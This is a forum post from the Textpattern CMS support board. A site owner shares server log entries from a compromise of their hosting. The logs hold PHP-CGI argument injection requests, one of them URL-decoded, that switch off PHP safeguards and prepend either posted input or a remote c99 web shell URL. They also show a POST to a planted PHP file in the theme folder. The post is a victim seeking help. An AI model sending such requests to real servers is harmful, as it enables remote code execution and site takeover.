Textpattern CMS

#13 2013-10-05 17:09:04

GugUser

Member

From: Quito (Ecuador)

Registered: 2007-12-16

Posts: 1,473

Re: Malicious software on the server

Thanks ruud for your suggestions.

From the hosting provider support I know in the meantime, that there were site visits of this type:

188.190.98.18 - - [12/Aug/2013:10:03:13 +0200] "POST /?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 200 - "-" "Python-urllib/2.6" domain.ch

Converted:

188.190.98.18 - - [12/Aug/2013:10:03:13 +0200] "POST /?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-n HTTP/1.1" 200 - "-" "Python-urllib/2.6" domain.ch

78.138.126.92 - - [19/Sep/2013:13:10:07 +0200] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A//creativeresinsdistribution.com/wp-content/themes/twentytwelv/work_c99.log HTTP/1.1" 200 581 "-" "Python-urllib/2.6" domain.ch

144.76.120.153 - - [23/Sep/2013:10:33:00 +0200] "POST /textpattern/theme/4f927.php HTTP/1.0" 200 182 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1" domain.ch

I don’t know for what it is, but the support says, this had been possible, because mod_security was disabled, as they noted later.

And that has its origins a few months ago regarding to this topic, are the same accounts.